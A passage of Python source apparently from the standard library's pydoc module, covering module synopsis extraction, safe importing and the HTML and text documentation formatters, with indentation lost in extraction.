line = line.strip()
if line[:4] == 'r"""': line = line[1:]
if line[:3] == '"""':
line = line[3:]
if line[-1:] == '\\': line = line[:-1]
while not line.strip():
line = file.readline()
if not line: break
result = line.split('"""')[0].strip()
else: result = None
return result
def synopsis(filename, cache={}):
"""Get the one-line summary out of a module file."""
mtime = os.stat(filename).st_mtime
lastupdate, result = cache.get(filename, (None, None))
if lastupdate is None or lastupdate < mtime:
# Look for binary suffixes first, falling back to source.
if filename.endswith(tuple(importlib.machinery.BYTECODE_SUFFIXES)):
loader_cls = importlib.machinery.SourcelessFileLoader
elif filename.endswith(tuple(importlib.machinery.EXTENSION_SUFFIXES)):
loader_cls = importlib.machinery.ExtensionFileLoader
else:
loader_cls = None
# Now handle the choice.
if loader_cls is None:
# Must be a source file.
try:
file = tokenize.open(filename)
except OSError:
# module can't be opened, so skip it
return None
# text modules can be directly examined
with file:
result = source_synopsis(file)
else:
# Must be a binary module, which has to be imported.
loader = loader_cls('__temp__', filename)
# XXX We probably don't need to pass in the loader here.
spec = importlib.util.spec_from_file_location('__temp__', filename,
loader=loader)
_spec = importlib._bootstrap._SpecMethods(spec)
try:
module = _spec.load()
except:
return None
del sys.modules['__temp__']
result = (module.__doc__ or '').splitlines()[0]
# Cache the result.
cache[filename] = (mtime, result)
return result
class ErrorDuringImport(Exception):
"""Errors that occurred while trying to import something to document it."""
def __init__(self, filename, exc_info):
self.filename = filename
self.exc, self.value, self.tb = exc_info
def __str__(self):
exc = self.exc.__name__
return 'problem in %s - %s: %s' % (self.filename, exc, self.value)
def importfile(path):
"""Import a Python source file or compiled file given its path."""
magic = importlib.util.MAGIC_NUMBER
with open(path, 'rb') as file:
is_bytecode = magic == file.read(len(magic))
filename = os.path.basename(path)
name, ext = os.path.splitext(filename)
if is_bytecode:
loader = importlib._bootstrap.SourcelessFileLoader(name, path)
else:
loader = importlib._bootstrap.SourceFileLoader(name, path)
# XXX We probably don't need to pass in the loader here.
spec = importlib.util.spec_from_file_location(name, path, loader=loader)
_spec = importlib._bootstrap._SpecMethods(spec)
try:
return _spec.load()
except:
raise ErrorDuringImport(path, sys.exc_info())
def safeimport(path, forceload=0, cache={}):
"""Import a module; handle errors; return None if the module isn't found.
If the module *is* found but an exception occurs, it's wrapped in an
ErrorDuringImport exception and reraised. Unlike __import__, if a
package path is specified, the module at the end of the path is returned,
not the package at the beginning. If the optional 'forceload' argument
is 1, we reload the module from disk (unless it's a dynamic extension)."""
try:
# If forceload is 1 and the module has been previously loaded from
# disk, we always have to reload the module. Checking the file's
# mtime isn't good enough (e.g. the module could contain a class
# that inherits from another module that has changed).
if forceload and path in sys.modules:
if path not in sys.builtin_module_names:
# Remove the module from sys.modules and re-import to try
# and avoid problems with partially loaded modules.
# Also remove any submodules because they won't appear
# in the newly loaded module's namespace if they're already
# in sys.modules.
subs = [m for m in sys.modules if m.startswith(path + '.')]
for key in [path] + subs:
# Prevent garbage collection.
cache[key] = sys.modules[key]
del sys.modules[key]
module = __import__(path)
except:
# Did the error occur before or after the module was found?
(exc, value, tb) = info = sys.exc_info()
if path in sys.modules:
# An error occurred while executing the imported module.
raise ErrorDuringImport(sys.modules[path].__file__, info)
elif exc is SyntaxError:
# A SyntaxError occurred before we could execute the module.
raise ErrorDuringImport(value.filename, info)
elif exc is ImportError and value.name == path:
# No such module in the path.
return None
else:
# Some other error occurred during the importing process.
raise ErrorDuringImport(path, sys.exc_info())
for part in path.split('.')[1:]:
try: module = getattr(module, part)
except AttributeError: return None
return module
# ---------------------------------------------------- formatter base class
class Doc:
PYTHONDOCS = os.environ.get("PYTHONDOCS",
"http://docs.python.org/%d.%d/library"
% sys.version_info[:2])
def document(self, object, name=None, *args):
"""Generate documentation for an object."""
args = (object, name) + args
# 'try' clause is to attempt to handle the possibility that inspect
# identifies something in a way that pydoc itself has issues handling;
# think 'super' and how it is a descriptor (which raises the exception
# by lacking a __name__ attribute) and an instance.
if inspect.isgetsetdescriptor(object): return self.docdata(*args)
if inspect.ismemberdescriptor(object): return self.docdata(*args)
try:
if inspect.ismodule(object): return self.docmodule(*args)
if inspect.isclass(object): return self.docclass(*args)
if inspect.isroutine(object): return self.docroutine(*args)
except AttributeError:
pass
if isinstance(object, property): return self.docproperty(*args)
return self.docother(*args)
def fail(self, object, name=None, *args):
"""Raise an exception for unimplemented types."""
message = "don't know how to document object%s of type %s" % (
name and ' ' + repr(name), type(object).__name__)
raise TypeError(message)
docmodule = docclass = docroutine = docother = docproperty = docdata = fail
def getdocloc(self, object):
"""Return the location of module docs or None"""
try:
file = inspect.getabsfile(object)
except TypeError:
file = '(built-in)'
docloc = os.environ.get("PYTHONDOCS", self.PYTHONDOCS)
basedir = os.path.join(sys.base_exec_prefix, "lib",
"python%d.%d" % sys.version_info[:2])
if (isinstance(object, type(os)) and
(object.__name__ in ('errno', 'exceptions', 'gc', 'imp',
'marshal', 'posix', 'signal', 'sys',
'_thread', 'zipimport') or
(file.startswith(basedir) and
not file.startswith(os.path.join(basedir, 'site-packages')))) and
object.__name__ not in ('xml.etree', 'test.pydoc_mod')):
if docloc.startswith("http://"):
docloc = "%s/%s" % (docloc.rstrip("/"), object.__name__)
else:
docloc = os.path.join(docloc, object.__name__ + ".html")
else:
docloc = None
return docloc
# -------------------------------------------- HTML documentation generator
class HTMLRepr(Repr):
"""Class for safely making an HTML representation of a Python object."""
def __init__(self):
Repr.__init__(self)
self.maxlist = self.maxtuple = 20
self.maxdict = 10
self.maxstring = self.maxother = 100
def escape(self, text):
return replace(text, '&', '&', '<', '<', '>', '>')
def repr(self, object):
return Repr.repr(self, object)
def repr1(self, x, level):
if hasattr(type(x), '__name__'):
methodname = 'repr_' + '_'.join(type(x).__name__.split())
if hasattr(self, methodname):
return getattr(self, methodname)(x, level)
return self.escape(cram(stripid(repr(x)), self.maxother))
def repr_string(self, x, level):
test = cram(x, self.maxstring)
testrepr = repr(test)
if '\\' in test and '\\' not in replace(testrepr, r'\\', ''):
# Backslashes are only literal in the string and are never
# needed to make any special characters, so show a raw string.
return 'r' + testrepr[0] + self.escape(test) + testrepr[0]
return re.sub(r'((\\[\\abfnrtv\'"]|\\[0-9]..|\\x..|\\u....)+)',
r'<span class="repr_string">\1</span>',
self.escape(testrepr))
repr_str = repr_string
def repr_instance(self, x, level):
try:
return self.escape(cram(stripid(repr(x)), self.maxstring))
except:
return self.escape('<%s instance>' % x.__class__.__name__)
repr_unicode = repr_string
class HTMLDoc(Doc):
"""Formatter class for HTML documentation."""
# ------------------------------------------- HTML formatting utilities
_repr_instance = HTMLRepr()
repr = _repr_instance.repr
escape = _repr_instance.escape
def page(self, title, contents):
"""Format an HTML page."""
return '''\
<!doctype html>
<html><head><title>Python: %s</title>
<meta charset="UTF-8">
</head><body>
%s
</body></html>''' % (title, contents)
def heading(self, title, extras=''):
"""Format a page heading."""
return '''
<table class="heading">
<tr><td>{}</td><td class="align_right normal">{}</td></tr></table>
'''.format(title, extras or ' ')
def html_section(self, title, contents, width=6,
prelude='', marginalia=None, gap=' ',
css_class=''):
"""Format a section with a heading."""
if marginalia is None:
marginalia = '<code>' + ' ' * width + '</code>'
result = '''<br>
<table class="{}">
<tr>
<td colspan="3"> <br>
{}</td></tr>
'''.format(css_class, title)
if prelude:
result = result + '''
<tr><td rowspan="2">{}</td>
<td colspan="2">{}</td></tr>
<tr><td>{}</td>'''.format(marginalia, prelude, gap)
else:
result = result + '''
<tr><td>{}</td><td>{}</td>'''.format(marginalia, gap)
contents = '{}</td></tr></table>'.format(contents)
return result + '\n<td class="inner_table">' + contents
def bigsection(self, title, *args, **kwargs):
"""Format a section with a big heading."""
title = '<span class="section_title">{}</span>'.format(title)
return self.html_section(title, *args, **kwargs)
def preformat(self, text):
"""Format literal preformatted text."""
text = self.escape(text.expandtabs())
return replace(text, '\n\n', '\n \n', '\n\n', '\n \n',
' ', ' ', '\n', '<br>\n')
def multicolumn(self, list, format, cols=4):
"""Format a list of items into a multi-column list."""
result = ''
rows = (len(list)+cols-1)//cols
for col in range(cols):
result = result + '<td style="width:%d%%;vertical-align:text-top">' % (100//cols)
for i in range(rows*col, rows*col+rows):
if i < len(list):
result = result + format(list[i]) + '<br>\n'
result = result + '</td>'
return '<table style="width:100%%"><tr>%s</tr></table>' % result
def grey(self, text): return '<span class="grey">%s</span>' % text
def namelink(self, name, *dicts):
"""Make a link for an identifier, given name-to-URL mappings."""
for dict in dicts:
if name in dict:
return '<a href="%s">%s</a>' % (dict[name], name)
return name
def classlink(self, object, modname):
"""Make a link for a class."""
name, module = object.__name__, sys.modules.get(object.__module__)
if hasattr(module, name) and getattr(module, name) is object:
return '<a href="%s.html#%s">%s</a>' % (
module.__name__, name, classname(object, modname))
return classname(object, modname)
def modulelink(self, object):
"""Make a link for a module."""
return '<a href="%s.html">%s</a>' % (object.__name__, object.__name__)
def modpkglink(self, modpkginfo):
"""Make a link for a module or package to display in an index."""
name, path, ispackage, shadowed = modpkginfo
if shadowed:
return self.grey(name)
if path:
url = '%s.%s.html' % (path, name)
else:
url = '%s.html' % name
if ispackage:
text = '<strong>%s</strong> (package)' % name
else:
text = name
return '<a href="%s">%s</a>' % (url, text)
def filelink(self, url, path):
"""Make a link to source file."""
return '<a href="file:%s">%s</a>' % (url, path)
def markup(self, text, escape=None, funcs={}, classes={}, methods={}):
"""Mark up some plain text, given a context of symbols to look for.
Each context dictionary maps object names to anchor names."""
escape = escape or self.escape
results = []
here = 0
pattern = re.compile(r'\b((http|ftp)://\S+[\w/]|'
r'RFC[- ]?(\d+)|'
r'PEP[- ]?(\d+)|'
r'(self\.)?(\w+))')
while True:
match = pattern.search(text, here)
if not match: break
start, end = match.span()
results.append(escape(text[here:start]))
all, scheme, rfc, pep, selfdot, name = match.groups()
if scheme:
url = escape(all).replace('"', '"')
results.append('<a href="%s">%s</a>' % (url, url))
elif rfc:
url = 'http://www.rfc-editor.org/rfc/rfc%d.txt' % int(rfc)
results.append('<a href="%s">%s</a>' % (url, escape(all)))
elif pep:
url = 'http://www.python.org/dev/peps/pep-%04d/' % int(pep)
results.append('<a href="%s">%s</a>' % (url, escape(all)))
elif text[end:end+1] == '(':
results.append(self.namelink(name, methods, funcs, classes))
elif selfdot:
results.append('self.<strong>%s</strong>' % name)
else:
results.append(self.namelink(name, classes))
here = end
results.append(escape(text[here:]))
return ''.join(results)
# ---------------------------------------------- type-specific routines
def formattree(self, tree, modname, parent=None):
"""Produce HTML for a class tree as given by inspect.getclasstree()."""
result = ''
for entry in tree:
if type(entry) is type(()):
c, bases = entry
result = result + '<dt>'
result = result + self.classlink(c, modname)
if bases and bases != (parent,):
parents = []
for base in bases:
parents.append(self.classlink(base, modname))
result = result + '(' + ', '.join(parents) + ')'
result = result + '\n</dt>'
elif type(entry) is type([]):
result = result + '<dd>\n%s</dd>\n' % self.formattree(
entry, modname, c)
return '<dl><dt></dt>\n%s<dd></dd></dl>\n' % result
def docmodule(self, object, name=None, mod=None, *ignored):
"""Produce HTML documentation for a module object."""
name = object.__name__ # ignore the passed-in name
try:
all = object.__all__
except AttributeError:
all = None
parts = name.split('.')
links = []
for i in range(len(parts)-1):
links.append(
'<a href="{}.html" class="docmodule_link">{}</a>'.format(
'.'.join(parts[:i+1]), parts[i]))
head = '.'.join(links + parts[-1:])
try:
path = inspect.getabsfile(object)
url = path
if sys.platform == 'win32':
import nturl2path
url = nturl2path.pathname2url(path)
filelink = self.filelink(url, path)
except TypeError:
filelink = '(built-in)'
info = []
if hasattr(object, '__version__'):
version = str(object.__version__)
if version[:11] == '$' + 'Revision: ' and version[-1:] == '$':
version = version[11:-1].strip()
info.append('version %s' % self.escape(version))
if hasattr(object, '__date__'):
info.append(self.escape(str(object.__date__)))
if info:
head = head + ' (%s)' % ', '.join(info)
docloc = self.getdocloc(object)
if docloc is not None:
docloc = '<br><a href="%(docloc)s">Module Reference</a>' % locals()
else:
docloc = ''
extras = '<a href=".">index</a><br>' + filelink + docloc
result = self.heading(head, extras)
modules = inspect.getmembers(object, inspect.ismodule)
classes, cdict = [], {}
for key, value in inspect.getmembers(object, inspect.isclass):
# if __all__ exists, believe it. Otherwise use old heuristic.
if (all is not None or
(inspect.getmodule(value) or object) is object):
if visiblename(key, all, object):
classes.append((key, value))
cdict[key] = cdict[value] = '#' + key
for key, value in classes:
for base in value.__bases__:
key, modname = base.__name__, base.__module__
module = sys.modules.get(modname)
if modname != name and module and hasattr(module, key):
if getattr(module, key) is base:
if key not in cdict:
cdict[key] = cdict[base] = modname + '.html#' + key
funcs, fdict = [], {}
for key, value in inspect.getmembers(object, inspect.isroutine):
# if __all__ exists, believe it. Otherwise use old heuristic.
if (all is not None or inspect.isbuiltin(value) or
inspect.getmodule(value) is object):
if visiblename(key, all, object):
funcs.append((key, value))
fdict[key] = '#-' + key
if inspect.isfunction(value): fdict[value] = fdict[key]
data = []
for key, value in inspect.getmembers(object, isdata):
if visiblename(key, all, object):
data.append((key, value))
doc = self.markup(getdoc(object), self.preformat, fdict, cdict)
doc = doc and '<code>{}</code>'.format(doc)
result = result + '<p>%s</p>\n' % doc
if hasattr(object, '__path__'):
modpkgs = []
for importer, modname, ispkg in pkgutil.iter_modules(object.__path__):
modpkgs.append((modname, name, ispkg, 0))
modpkgs.sort()
contents = self.multicolumn(modpkgs, self.modpkglink)
result = result + self.bigsection('Package Contents', contents,
css_class="package")
elif modules:
contents = self.multicolumn(
modules, lambda t: self.modulelink(t[1]))
result = result + self.bigsection('Modules', contents,
css_class="module")
if classes:
classlist = [value for (key, value) in classes]
contents = [
self.formattree(inspect.getclasstree(classlist, 1), name)]
for key, value in classes:
contents.append(self.document(value, key, name, fdict, cdict))
result = result + self.bigsection('Classes', ' '.join(contents),
css_class="classes")
if funcs:
contents = []
for key, value in funcs:
contents.append(self.document(value, key, name, fdict, cdict))
result = result + self.bigsection('Functions', ' '.join(contents),
css_class="functions")
if data:
contents = []
for key, value in data:
contents.append(self.document(value, key))
result = result + self.bigsection('Data', '<br>\n'.join(contents),
css_class="data")
if hasattr(object, '__author__'):
contents = self.markup(str(object.__author__), self.preformat)
result = result + self.bigsection('Author', contents, css_class="author")
if hasattr(object, '__credits__'):
contents = self.markup(str(object.__credits__), self.preformat)
result = result + self.bigsection('Credits', contents, css_class="credits")
return result
def docclass(self, object, name=None, mod=None, funcs={}, classes={},
*ignored):
"""Produce HTML documentation for a class object."""
realname = object.__name__
name = name or realname
bases = object.__bases__
contents = []
push = contents.append
# Cute little class to pump out a horizontal rule between sections.
class HorizontalRule:
def __init__(self):
self.needone = 0
def maybe(self):
if self.needone:
push('<hr>\n')
self.needone = 1
hr = HorizontalRule()
# List the mro, if non-trivial.
mro = deque(inspect.getmro(object))
if len(mro) > 2:
hr.maybe()
push('<dl><dt>Method resolution order:</dt>\n')
for base in mro:
push('<dd>%s</dd>\n' % self.classlink(base,
object.__module__))
push('</dl>\n')
def spill(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
try:
value = getattr(object, name)
except Exception:
# Some descriptors may meet a failure in their __get__.
# (bug #1785)
push(self._docdescriptor(name, value, mod))
else:
push(self.document(value, name, mod,
funcs, classes, mdict, object))
push('\n')
return attrs
def spilldescriptors(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
push(self._docdescriptor(name, value, mod))
return attrs
def spilldata(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
base = self.docother(getattr(object, name), name, mod)
if callable(value) or inspect.isdatadescriptor(value):
doc = getattr(value, "__doc__", None)
else:
doc = None
if doc is None:
push('<dl><dt>%s</dt><dd></dd></dl>\n' % base)
else:
doc = self.markup(getdoc(value), self.preformat,
funcs, classes, mdict)
doc = '<dd><code>%s</code></dd>' % doc
push('<dl><dt>%s%s</dt></dl>\n' % (base, doc))
push('\n')
return attrs
attrs = [(name, kind, cls, value)
for name, kind, cls, value in classify_class_attrs(object)
if visiblename(name, obj=object)]
mdict = {}
for key, kind, homecls, value in attrs:
mdict[key] = anchor = '#' + name + '-' + key
try:
value = getattr(object, name)
except Exception:
# Some descriptors may meet a failure in their __get__.
# (bug #1785)
pass
try:
# The value may not be hashable (e.g., a data attr with
# a dict or list value).
mdict[value] = anchor
except TypeError:
pass
while attrs:
if mro:
thisclass = mro.popleft()
else:
thisclass = attrs[0][2]
attrs, inherited = _split_list(attrs, lambda t: t[2] is thisclass)
if thisclass is builtins.object:
attrs = inherited
continue
elif thisclass is object:
tag = 'defined here'
else:
tag = 'inherited from %s' % self.classlink(thisclass,
object.__module__)
tag += ':<br>\n'
# Sort attrs by name.
attrs.sort(key=lambda t: t[0])
# Pump out the attrs, segregated by kind.
attrs = spill('Methods %s' % tag, attrs,
lambda t: t[1] == 'method')
attrs = spill('Class methods %s' % tag, attrs,
lambda t: t[1] == 'class method')
attrs = spill('Static methods %s' % tag, attrs,
lambda t: t[1] == 'static method')
attrs = spilldescriptors('Data descriptors %s' % tag, attrs,
lambda t: t[1] == 'data descriptor')
attrs = spilldata('Data and other attributes %s' % tag, attrs,
lambda t: t[1] == 'data')
assert attrs == []
attrs = inherited
contents = ''.join(contents)
if name == realname:
title = '<a id="%s">class <strong>%s</strong></a>' % (
name, realname)
else:
title = '<strong>%s</strong> = <a id="%s">class %s</a>' % (
name, name, realname)
if bases:
parents = []
for base in bases:
parents.append(self.classlink(base, object.__module__))
title = title + '(%s)' % ', '.join(parents)
doc = self.markup(getdoc(object), self.preformat, funcs, classes, mdict)
doc = doc and '<code>%s<br> </code>' % doc
return self.html_section(title, contents, 3, doc, css_class="docclass")
def formatvalue(self, object):
"""Format an argument default value as text."""
return self.grey('=' + self.repr(object))
def docroutine(self, object, name=None, mod=None,
funcs={}, classes={}, methods={}, cl=None):
"""Produce HTML documentation for a function or method object."""
realname = object.__name__
name = name or realname
anchor = (cl and cl.__name__ or '') + '-' + name
note = ''
skipdocs = 0
if _is_bound_method(object):
imclass = object.__self__.__class__
if cl:
if imclass is not cl:
note = ' from ' + self.classlink(imclass, mod)
else:
if object.__self__ is not None:
note = ' method of %s instance' % self.classlink(
object.__self__.__class__, mod)
else:
note = ' unbound %s method' % self.classlink(imclass, mod)
if name == realname:
title = '<a id="%s"><strong>%s</strong></a>' % (anchor, realname)
else:
if (cl and realname in cl.__dict__ and
cl.__dict__[realname] is object):
reallink = '<a href="#%s">%s</a>' % (
cl.__name__ + '-' + realname, realname)
skipdocs = 1
else:
reallink = realname
title = '<a id="%s"><strong>%s</strong></a> = %s' % (
anchor, name, reallink)
argspec = None
if inspect.isroutine(object):
try:
signature = inspect.signature(object)
except (ValueError, TypeError):
signature = None
if signature:
argspec = str(signature)
if realname == '<lambda>':
title = '<strong>%s</strong> <em>lambda</em> ' % name
# XXX lambda's won't usually have func_annotations['return']
# since the syntax doesn't support but it is possible.
# So removing parentheses isn't truly safe.
argspec = argspec[1:-1] # remove parentheses
if not argspec:
argspec = '(...)'
decl = title + argspec + (note and self.grey(note))
if skipdocs:
return '<dl><dt>%s</dt><dd></dd></dl>\n' % decl
else:
doc = self.markup(
getdoc(object), self.preformat, funcs, classes, methods)
doc = doc and '<dd><code>%s</code></dd>' % doc
return '<dl><dt>%s</dt><dd></dd>%s</dl>\n' % (decl, doc)
def _docdescriptor(self, name, value, mod):
results = []
push = results.append
if name:
push('<dl><dt><strong>%s</strong></dt>\n' % name)
if value.__doc__ is not None:
doc = self.markup(getdoc(value), self.preformat)
push('<dd><code>%s</code></dd>\n' % doc)
push('<dd></dd></dl>\n')
return ''.join(results)
def docproperty(self, object, name=None, mod=None, cl=None):
"""Produce html documentation for a property."""
return self._docdescriptor(name, object, mod)
def docother(self, object, name=None, mod=None, *ignored):
"""Produce HTML documentation for a data object."""
lhs = name and '<strong>%s</strong> = ' % name or ''
return lhs + self.repr(object)
def docdata(self, object, name=None, mod=None, cl=None):
"""Produce html documentation for a data descriptor."""
return self._docdescriptor(name, object, mod)
def index(self, dir_, shadowed=None):
"""Generate an HTML index for a directory of modules."""
modpkgs = []
if shadowed is None: shadowed = {}
for importer, name, ispkg in pkgutil.iter_modules([dir_]):
if any((0xD800 <= ord(ch) <= 0xDFFF) for ch in name):
# ignore a module if its name contains a surrogate character
continue
modpkgs.append((name, '', ispkg, name in shadowed))
shadowed[name] = 1
modpkgs.sort()
contents = self.multicolumn(modpkgs, self.modpkglink)
return self.bigsection(dir_, contents, css_class="index")
# -------------------------------------------- text documentation generator
class TextRepr(Repr):
"""Class for safely making a text representation of a Python object."""
def __init__(self):
Repr.__init__(self)
self.maxlist = self.maxtuple = 20
self.maxdict = 10
self.maxstring = self.maxother = 100
def repr1(self, x, level):
if hasattr(type(x), '__name__'):
methodname = 'repr_' + '_'.join(type(x).__name__.split())
if hasattr(self, methodname):
return getattr(self, methodname)(x, level)
return cram(stripid(repr(x)), self.maxother)
def repr_string(self, x, level):
test = cram(x, self.maxstring)
testrepr = repr(test)
if '\\' in test and '\\' not in replace(testrepr, r'\\', ''):
# Backslashes are only literal in the string and are never
# needed to make any special characters, so show a raw string.
return 'r' + testrepr[0] + test + testrepr[0]
return testrepr
repr_str = repr_string
def repr_instance(self, x, level):
try:
return cram(stripid(repr(x)), self.maxstring)
except:
return '<%s instance>' % x.__class__.__name__
class TextDoc(Doc):
"""Formatter class for text documentation."""
# ------------------------------------------- text formatting utilities
_repr_instance = TextRepr()
repr = _repr_instance.repr
def bold(self, text):
"""Format a string in bold by overstriking."""
return ''.join(ch + '\b' + ch for ch in text)
def indent(self, text, prefix=' '):
"""Indent text by prepending a given prefix to each line."""
if not text: return ''
lines = [prefix + line for line in text.split('\n')]
if lines: lines[-1] = lines[-1].rstrip()
return '\n'.join(lines)
def section(self, title, contents):
"""Format a section with a given heading."""
clean_contents = self.indent(contents).rstrip()
return self.bold(title) + '\n' + clean_contents + '\n\n'
# ---------------------------------------------- type-specific routines
def formattree(self, tree, modname, parent=None, prefix=''):
"""Render in text a class tree as returned by inspect.getclasstree()."""
result = ''
for entry in tree:
if type(entry) is type(()):
c, bases = entry
result = result + prefix + classname(c, modname)
if bases and bases != (parent,):
parents = (classname(c, modname) for c in bases)
result = result + '(%s)' % ', '.join(parents)
result = result + '\n'
elif type(entry) is type([]):
result = result + self.formattree(
entry, modname, c, prefix + ' ')
return result
def docmodule(self, object, name=None, mod=None):
"""Produce text documentation for a given module object."""
name = object.__name__ # ignore the passed-in name
synop, desc = splitdoc(getdoc(object))
result = self.section('NAME', name + (synop and ' - ' + synop))
all = getattr(object, '__all__', None)
docloc = self.getdocloc(object)
if docloc is not None:
result = result + self.section('MODULE REFERENCE', docloc + """
The following documentation is automatically generated from the Python
source files. It may be incomplete, incorrect or include features that
are considered implementation detail and may vary between Python
implementations. When in doubt, consult the module reference at the
location listed above.
""")
if desc:
result = result + self.section('DESCRIPTION', desc)
classes = []
for key, value in inspect.getmembers(object, inspect.isclass):
# if __all__ exists, believe it. Otherwise use old heuristic.
if (all is not None
or (inspect.getmodule(value) or object) is object):
if visiblename(key, all, object):
classes.append((key, value))
funcs = []
for key, value in inspect.getmembers(object, inspect.isroutine):
# if __all__ exists, believe it. Otherwise use old heuristic.
if (all is not None or
inspect.isbuiltin(value) or inspect.getmodule(value) is object):
if visiblename(key, all, object):
funcs.append((key, value))
data = []
for key, value in inspect.getmembers(object, isdata):
if visiblename(key, all, object):
data.append((key, value))
modpkgs = []
modpkgs_names = set()
if hasattr(object, '__path__'):
for importer, modname, ispkg in pkgutil.iter_modules(object.__path__):
modpkgs_names.add(modname)
if ispkg:
modpkgs.append(modname + ' (package)')
else:
modpkgs.append(modname)
modpkgs.sort()
result = result + self.section(
'PACKAGE CONTENTS', '\n'.join(modpkgs))
# Detect submodules as sometimes created by C extensions
submodules = []
for key, value in inspect.getmembers(object, inspect.ismodule):
if value.__name__.startswith(name + '.') and key not in modpkgs_names:
submodules.append(key)
if submodules:
submodules.sort()
result = result + self.section(
'SUBMODULES', '\n'.join(submodules))
if classes:
classlist = [value for key, value in classes]
contents = [self.formattree(
inspect.getclasstree(classlist, 1), name)]
for key, value in classes:
contents.append(self.document(value, key, name))
result = result + self.section('CLASSES', '\n'.join(contents))
if funcs:
contents = []
for key, value in funcs:
contents.append(self.document(value, key, name))
result = result + self.section('FUNCTIONS', '\n'.join(contents))
if data:
contents = []
for key, value in data:
contents.append(self.docother(value, key, name, maxlen=70))
result = result + self.section('DATA', '\n'.join(contents))
if hasattr(object, '__version__'):
version = str(object.__version__)
if version[:11] == '$' + 'Revision: ' and version[-1:] == '$':
version = version[11:-1].strip()
result = result + self.section('VERSION', version)
if hasattr(object, '__date__'):
result = result + self.section('DATE', str(object.__date__))
if hasattr(object, '__author__'):
result = result + self.section('AUTHOR', str(object.__author__))
if hasattr(object, '__credits__'):
result = result + self.section('CREDITS', str(object.__credits__))
try:
file = inspect.getabsfile(object)
except TypeError:
file = '(built-in)'
result = result + self.section('FILE', file)
return result
def docclass(self, object, name=None, mod=None, *ignored):
"""Produce text documentation for a given class object."""
realname = object.__name__
name = name or realname
bases = object.__bases__
def makename(c, m=object.__module__):
return classname(c, m)
if name == realname:
title = 'class ' + self.bold(realname)
else:
title = self.bold(name) + ' = class ' + realname
if bases:
parents = map(makename, bases)
title = title + '(%s)' % ', '.join(parents)
doc = getdoc(object)
contents = doc and [doc + '\n'] or []
push = contents.append
# List the mro, if non-trivial.
mro = deque(inspect.getmro(object))
if len(mro) > 2:
push("Method resolution order:")
for base in mro:
push(' ' + makename(base))
push('')
# Cute little class to pump out a horizontal rule between sections.
class HorizontalRule:
def __init__(self):
self.needone = 0
def maybe(self):
if self.needone:
push('-' * 70)
self.needone = 1
hr = HorizontalRule()
def spill(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
try:
value = getattr(object, name)
except Exception:
# Some descriptors may meet a failure in their __get__.
# (bug #1785)
push(self._docdescriptor(name, value, mod))
else:
push(self.document(value,
name, mod, object))
return attrs
def spilldescriptors(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
push(self._docdescriptor(name, value, mod))
return attrs
def spilldata(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
if callable(value) or inspect.isdatadescriptor(value):
doc = getdoc(value)
else:
doc = None
try:
obj = getattr(object, name)
except AttributeError:
obj = homecls.__dict__[name]
push(self.docother(obj, name, mod, maxlen=70, doc=doc) +
'\n')
return attrs
attrs = [(name, kind, cls, value)
for name, kind, cls, value in classify_class_attrs(object)
if visiblename(name, obj=object)]
while attrs:
if mro:
thisclass = mro.popleft()
else:
thisclass = attrs[0][2]
attrs, inherited = _split_list(attrs, lambda t: t[2] is thisclass)
if thisclass is builtins.object:
attrs = inherited
continue
elif thisclass is object:
tag = "defined here"
else:
tag = "inherited from %s" % classname(thisclass,
object.__module__)
# Sort attrs by name.
attrs.sort()
# Pump out the attrs, segregated by kind.
attrs = spill("Methods %s:\n" % tag, attrs,
lambda t: t[1] == 'method')
attrs = spill("Class methods %s:\n" % tag, attrs,
lambda t: t[1] == 'class method')
attrs = spill("Static methods %s:\n" % tag, attrs,
lambda t: t[1] == 'static method')
attrs = spilldescriptors("Data descriptors %s:\n" % tag, attrs,
lambda t: t[1] == 'data descriptor')
attrs = spilldata("Data and other attributes %s:\n" % tag, attrs,
lambda t: t[1] == 'data')
assert attrs == []
attrs = inherited
contents = '\n'.join(contents)
if not contents:
return title + '\n'
return title + '\n' + self.indent(contents.rstrip(), ' | ') + '\n'
def formatvalue(self, object):
"""Format an argument default value as text."""
return '=' + self.repr(object)
def docroutine(self, object, name=None, mod=None, cl=None):
"""Produce text documentation for a function or method object."""
realname = object.__name__
name = name or realname
note = ''
skipdocs = 0
if _is_bound_method(object):
imclass = object.__self__.__class__
if cl:
if imclass is not cl:
note = ' from ' + classname(imclass, mod)
else:
if object.__self__ is not None:
note = ' method of %s instance' % classname(
object.__self__.__class__, mod)
else:
note = ' unbound %s method' % classname(imclass, mod)
if name == realname:
title = self.bold(realname)
else:
if (cl and realname in cl.__dict__ and
cl.__dict__[realname] is object):
skipdocs = 1
title = self.bold(name) + ' = ' + realname
argspec = None
if inspect.isroutine(object):
try:
signature = inspect.signature(object)
except (ValueError, TypeError):
signature = None
if signature:
argspec = str(signature)
if realname == '<lambda>':
title = self.bold(name) + ' lambda '
# XXX lambda's won't usually have func_annotations['return']
# since the syntax doesn't support but it is possible.
# So removing parentheses isn't truly safe.
argspec = argspec[1:-1] # remove parentheses
if not argspec:
argspec = '(...)'
decl = title + argspec + note
if skipdocs:
return decl + '\n'
else:
doc = getdoc(object) or ''
return decl + '\n' + (doc and self.indent(doc).rstrip() + '\n')
def _docdescriptor(self, name, value, mod):
results = []
push = results.append
if name:
push(self.bold(name))
push('\n')
doc = getdoc(value) or ''
if doc:
push(self.indent(doc))
push('\n')
return ''.join(results)
def docproperty(self, object, name=None, mod=None, cl=None):
"""Produce text documentation for a property."""
return self._docdescriptor(name, object, mod)
def docdata(self, object, name=None, mod=None, cl=None):
"""Produce text documentation for a data descriptor."""
return self._docdescriptor(name, object, mod)
def docother(self, object, name=None, mod=None, parent=None, maxlen=None, doc=None):
"""Produce text documentation for a data object."""
repr = self.repr(object)
if maxlen:
line = (name and name + ' = ' or '') + repr
chop = maxlen - len(line)
if chop < 0: repr = repr[:chop] + '...'
line = (name and self.bold(name) + ' = ' or '') + repr
if doc is not None:
